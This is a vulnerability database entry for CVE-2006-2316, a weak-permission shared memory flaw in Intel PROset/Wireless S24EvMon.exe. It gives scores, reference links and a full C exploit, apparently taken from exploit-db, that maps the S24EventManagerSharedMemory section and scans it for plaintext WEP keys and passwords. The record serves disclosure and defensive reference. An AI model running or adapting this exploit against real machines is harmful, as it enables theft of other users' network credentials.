CVE-2006-2316
CVSS 4.9
Published: 2006-05-11 20:02:00
Revised: 2011-03-07 21:35:57

[Original] S24EvMon.exe in the Intel PROset/Wireless software, possibly 10.1.0.33, uses a S24EventManagerSharedMemory shared memory section with weak permissions, which allows local users to read or modify passwords or other data, or cause a denial of service.


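[CNNVD] Intel PROset/Wireless S24EvMon.exe local information disclosure vulnerability (CNNVD-200605-221)

        S24EvMon.exe in the Intel PROset/Wireless software (possibly version 10.1.0.33) uses an S24EventManagerSharedMemory shared memory section with weak permissions, which allows local users to read or modify passwords or other data, or cause a denial of service.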

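- CVSS (base score)

CVSS score: 4.9 [MEDIUM]
Confidentiality impact: COMPLETE [Total information disclosure, resulting in all system files being revealed]
Integrity impact: NONE [No impact on system integrity]
Availability impact: NONE [No impact on system availability]
Attack complexity: LOW [No access restrictions for exploitation]
Attack vector: LOCAL [Exploitation requires physical access or a local account]
Authentication: NONE [Exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links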

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2316
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2316
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-221
(Official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/1737
(UNKNOWN)  VUPEN  ADV-2006-1737
http://www.securityfocus.com/bid/17914
(UNKNOWN)  BID  17914
http://www.securityfocus.com/archive/1/archive/1/433133/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060502 Intel wireless service s24evmon.exe confidential information disclosure.
http://www.reversemode.com/index.php?option=com_content&task=view&id=10&Itemid=1
(UNKNOWN)  MISC  http://www.reversemode.com/index.php?option=com_content&task=view&id=10&Itemid=1
http://xforce.iss.net/xforce/xfdb/26317
(UNKNOWN)  XF  intel-s24evmon-information-disclosure(26317)
http://securitytracker.com/id?1016621
(UNKNOWN)  SECTRACK  1016621
http://securityreason.com/securityalert/877
(UNKNOWN)  SREASON  877
http://secunia.com/advisories/20001
(UNKNOWN)  SECUNIA  20001

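- Vulnerability information

Intel PROset/Wireless S24EvMon.exe local information disclosure vulnerability
Medium risk  Access validation error
2006-05-11 00:00:00 2006-05-12 00:00:00
Local
        S24EvMon.exe in the Intel PROset/Wireless software (possibly version 10.1.0.33) uses an S24EventManagerSharedMemory shared memory section with weak permissions, which allows local users to read or modify passwords or other data, or cause a denial of service.

- Advisories and patches

        No data available

- Vulnerability information (1772)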

Intel Wireless Service (s24evmon.exe) Shared Memory Exploit (EDBID:1772)
windows local
2006-05-09 Verified
0 Ruben Santamarta
///////////////////////////////////////////////////////////////////////
////  S24EvMon.exe Intel Wireless Management Service KEY Hunter
////  Rubén Santamarta
////  ruben@reversemode.com
////  www.reversemode.com
////  28/04/2006
///////////////////////////////////////////////////////////////////////

/**********************************************************************************************************
 * Testing a vuln-finder application that I am developing, I found a flaw within S24EvMon.exe. 
 * It is a service which is part (at least) of the Intel PROset/Wireless software. This application 
 * is provided by Intel in order to support intel Wireless Devices based on Spectrum 24 chipsets.
 *
 * This service uses a shared memory section which is created without the proper security descriptor, 
 * allowing unprivileged users to perform operations like Delete, Read or Write into the memory. The 
 * section is named S24EventManagerSharedMemory
 * 
 * This shared memory is used to store, in plain text, confidential information like WEP Key, Passwords...
 *
 * The successful exploitation of this vulnerability could allow any unprivileged user to access 
 * confidential information, exposing the network. An important mitigating factor is that the 
 * vulnerability is local; nevertheless, some Malware could take advantage of this flaw. 
 **********************************************************************************************************/

#include <windows.h>
#include <stdio.h>

#define InitializeObjectAttributes( p, n, a, r, s ) {	\
     (p)->Length = sizeof( OBJECT_ATTRIBUTES );         \
     (p)->RootDirectory = r;                            \
     (p)->Attributes = a;                               \
     (p)->ObjectName = n;                               \
     (p)->SecurityDescriptor = s;                       \
     (p)->SecurityQualityOfService = NULL;              \
     }

#define InitializeUnicodeStr(p,s) {			\
     (p)->Length= wcslen(s)*2;				\
     (p)->MaximumLength = wcslen(s)*2+2;		\
     (p)->Buffer = s;					\
     }


typedef struct _SECTION_BASIC_INFORMATION {
  ULONG                   d000;
  ULONG                   SectionAttributes;
  LARGE_INTEGER           SectionSize;
} SECTION_BASIC_INFORMATION;

typedef struct _LSA_UNICODE_STRING {  
    USHORT Length;  
    USHORT MaximumLength; 
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING *ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        
    PVOID SecurityQualityOfService;  
} OBJECT_ATTRIBUTES;



typedef DWORD (WINAPI* PQUERYSECTION)(HANDLE, DWORD, PVOID,DWORD,DWORD*);

typedef DWORD (WINAPI* POPENSECTION)(HANDLE*, DWORD,OBJECT_ATTRIBUTES* );


VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}



int main(int argc, char* argv[])
{
 OBJECT_ATTRIBUTES SectionAttributes;
 SECTION_BASIC_INFORMATION buff;
 PQUERYSECTION NtQuerySection;
 POPENSECTION NtOpenSection;
 char * sMap,cString[256];
 UNICODE_STRING uStr;
 LPVOID lpMapAddress;
 DWORD i,b=0,c=0;
 HANDLE hSection;


NtOpenSection = (POPENSECTION) GetProcAddress( LoadLibrary( "ntdll.dll" ),
						   "NtOpenSection" );

NtQuerySection = (PQUERYSECTION) GetProcAddress( LoadLibrary( "ntdll.dll"),
						 "NtQuerySection" );

InitializeUnicodeStr(&uStr,L"\\BaseNamedObjects\\S24EventManagerSharedMemory");
InitializeObjectAttributes(&SectionAttributes, &uStr,NULL, NULL, NULL );	


NtOpenSection( &hSection, SECTION_MAP_READ|SECTION_QUERY,  &SectionAttributes );
 
if (hSection == NULL) ShowError();
printf("Section opened successfully.\n"); 
 

lpMapAddress = MapViewOfFile(hSection, FILE_MAP_READ, 0, 0, 0);
if (lpMapAddress == NULL) ShowError();
 
if (NtQuerySection(hSection,0,&buff,sizeof(buff),0)) ShowError();

sMap= ( char* )lpMapAddress;
printf("Scanning section...\n\n"); 

while(c<100)
{
 
 c++;
 printf("\nSNAPSHOT ID[%d]----------------[BEGIN]\n\n",c);
		
 for (i=0; i< buff.SectionSize.QuadPart; i++)
	{
	
		if( sMap[i]> 0x29  )
		{
			while( sMap[i] != 0x0 )
			{
				if( sMap[i]>=0x30 )
				{
					cString[b] = sMap[i];
					b++;
				}									
				i++;
			}
			
			cString[b++]='\0';
			// less 3 characters should be GARBAGE
			if( b>3 && b!=14 && b!=27 ) 	printf(" String collected: %s\n",cString);
			// Alphanumeric WEP KEY (13 characters)
			if( b==14 )	printf("### Possible Alphanumeric WEP KEY found: %s\n",cString);
			if( b==27 ) 
			{
                   		if(cString[0]!=0x30 && cString[2]!=0x30 && cString[6]!=0x30)
                       			printf("### Possible WEP KEY found(Ascii/HexMode): %s\n",cString);
                                else
                        		printf(" String collected: %s\n",cString);
                	}   
                	b=0;		
		}
			
	}
printf("\nSNAPSHOT ID[%d]----------------[END]\n",c);   

Sleep(1000);
}

CloseHandle(hSection);

return 0;
}

// milw0rm.com [2006-05-09]
		

- Vulnerability information

25357
Intel PROset/Wireless Software S24EvMon.exe Shared Memory Disclosure
Wireless Vector
Exploit Public Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-05-02 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
